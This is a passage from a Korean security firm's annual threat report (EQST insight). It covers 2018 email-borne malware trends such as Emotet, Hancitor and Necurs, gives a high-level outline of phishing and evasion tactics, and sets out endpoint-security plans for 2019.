24 5. APT 공격전개를위한전초전, 이메일공격확대 최초침투를위해해커들은앞으로도이메일공격을주로사용할것으로예상된다. 최근발생한류크랜섬웨어도초기침투는이메일을통해진행되었으며, 암호화폐거래소최초침투도이메일을통해전파되었다. 이메일공격은최초침투시타깃으로하는대상에대한이메일정보만있으면공격이가능하고, 사회공학기법과결합하면매우손쉽게대상을속일수있기때문에지속적으로자주사용된다. 이메일보안솔루션우회도다른보안솔루션에비해어렵지않게우회할수있기때문에해커는이메일공격을초기침투에활용하고주요공격수단으로이용할것으로예상된다. 18년발생한이메일공격통계및주요공격시나리오는다음과같다 년이메일위협통계정보 ( 단위 : 천건 ) 월 2월 3월 4월 5월 6월 7월 8월 9월 10월 11월 [ Secudium 관제데이터로보는 2018 년 월별탐지통계 ] 14 Emotet 악성메일유포증가 년이메일월별공격탐지데이터를분석한결과, Hancitor, 네커스 (Necurs), 이모텟메일악성코드가다량발생되었다. 오피스문서의매크로 (Macro) 를주로사용하는 Hancitor 악성코드는 1월부터현재까지지속적으로악성메일을유포하고있으며, PC내주요정보를공격자에게전송하는역할을한다. 네커스악성코드는수백만대의봇넷을형성하고있으며 5월경부터현재까지지속해서발견되고있다. 해당악성코드는랜섬웨어, RAT등의악성코드를배포한다. 9월부터이모텟악성코드는대량악성메일을발송하였고, 9월과 11월사이에오피스문서내 VBA 매크로를이용한파워셸 (Powershell) 공격을통해악성코드를실행하여뱅킹정보탈취를시도하였다. 24 EQST insight Annual REPORT

25 지능화 / 다양화되는이메일위협공격 협박 협박내용 - ID/PW 유출정보전송 - 음란물유통사이트정보수집 / 외부공개 협박최종목적 - 암호화폐요구 확산 중요정보획득 Mail 발송 악성코드실행 추가악성코드다운로드 기술적우회기법 - 압축 / 비밀번호첨부 - XML 형식파일링크 - 대용량메일첨부 사회공학적공격기법 - 기관 내부담당자사칭 - 제목에수신자소속 / 성명기입 감염장비 - PC/ 스마트폰 취약점 - Office 취약점 - IE/Flash 취약점 악성파일기능 - 금융 / 개인정보정보탈취 - RAT 종류 전파 / 확산기능탑재 - 대역대전파기능 발송 Target - 특정기업스피어피싱 - 불특정다수 이메일을통한악성코드의주요기법은아래와같다. 1. 사회공학적공격기법을통한악성 ( 피싱 /SCAM) 메일전송 2. 기술적우회기법들을통해이메일게이트웨이 ( Gateway), 안티바이러스 (AV) 등을 우회하는메일전송 악성메일전파를통해메일자격증명 (Mail Credential) 을획득후메일사용자로사칭하여악성메일을전파한다. 이는사회공학적공격기법을통해메일수신자가의심없이첨부파일, URL을클릭하게만들며, 이를통해공격자의의도대로악성코드가실행되면다양한악성행위를수행하게된다. 최근에는사회공학적공격기법에결합된기술적우회기법들이발전하고있다. 공격자는 다양한방식의파일압축, 포탈사이트대용량첨부메일 (URL), 첨부문서내 URL링크 등메일내탐지를우회하기위한악성코드첨부기법을다양화하고있다. 기존피싱, SCAM 등에서많이사용되었던사회공학적기법들이기술적우회기법과결합되면서, 공격유형들이다양화되고있다. EQST insight Annual REPORT 25

26 Tactics Technics Procedures 메일자격증명획득, 기업내주요정보획득, 암호화폐획득 1 메일자격증명을이용한사회공학적기법활용 2 악성파일다운로드링크를통한메일보안장비우회 3 사용자들이신뢰하는포탈사이트대용량파일링크를통한악성코드배포 4 스크립트 (Script) 파일을이용한백신우회 1 무차별악성메일발송 2 메일자격증명획득 3 획득한메일자격증명을이용하여특정타깃에게악성메일전송 4 사용자악성메일실행및감염 5 악의적인행위수행 [ 지능화 / 다양화되는이메일위협공격 TTP ] 26 EQST insight Annual REPORT

27 Conclusion 2019년 5대보안위협에대한전망을바탕으로보안대책을고려했을때, 가장시급한영역으로엔드포인트 (Endpoint) 보안을꼽을수있다. 랜섬웨어공격, 운영자를타깃으로한다양한공격, 이스트-웨스트공격시사용되는여러취약점에대응하기위해서는엔드포인트에대한보안대책이없이는대응하기불가능하기때문이다. 엔드포인트보안을위해최근많은보안기업들이 EDR(Endpoint Detection and Response), EPP(Endpoint Protection Platform) 솔루션을출시하고있고, 올해몇몇국내기업들이해당솔루션을도입하여운영하고있다. 하지만이솔루션은탐지, 분석하여대응및운영하기가매우어렵다. 이에 EQST 그룹은위협인텔리전스기반의고도화된탐지, 대응기술연구를통해주요보안위협에대한대책을제시하고자한다. 이와함께오픈소스소프트웨어보안대책을위해종합적인보안점검서비스를준비하고있다. 오픈소스소프트웨어보안대책을수립하기위해올해 6월이미기술적인보안가이드를발행한바있다. 내년에는보안가이드에기반하여방법론및체크리스트를구체화하고모의해킹및취약점점검을통해오픈소스소프트웨어에대해종합적인보안대책을제시할수있는서비스를제공할계획이다. 오픈소스보안가이드에이어클라우드 (Cloud) 보안가이드를 19년초에오픈소스보안가이드에이어클라우드 (Cloud) 보안가이드발행을앞두고있다. 또한, 관리서버에대한제로-데이 (Zero-Day) 취약점및사물인터넷기기 (IoT Device) 영역에대한대응을하기위해사내버그바운티 (Bug Bounty) 영역을보다확장하고자한다. 내년 EQST Lab에서는특정영역에대한테마를잡고해당영역에대한집중적인버그바운티를실행할계획이다. Industry 4.0 및 ICT 영역에서의신규보안연구를통해사물인터넷기기확장에따른신규보안위협에대해선제적인대응을할계획이다. 2019년보안위협은 2018년에발생한공격들이다양하게결합되고보다영역을확장하여공격할것이라예상된다. EQST Group은예상되는공격들을선제적으로연구하여가이드를제공할계획이며, 위협에대응할수있는전문가서비스를제공하여보안사고가최소화될수있는한해를만들고자한다. EQST Group 장이재우 EQST insight Annual REPORT 27

28 About EQST EQST( 이큐스트 ) 는 Experts, Qualified Security Team 이라는뜻으로사이버위협분석및연구분야에서검증된최고수준의보안전문가그룹이다. SK인포섹의보안전문가조직으로서 Secudium Intelligence를기반으로데이터를분석하고보안기술연구, 전략해킹, 취약점진단, 침해사고대응등을수행하고있다. 28 EQST insight Annual REPORT

29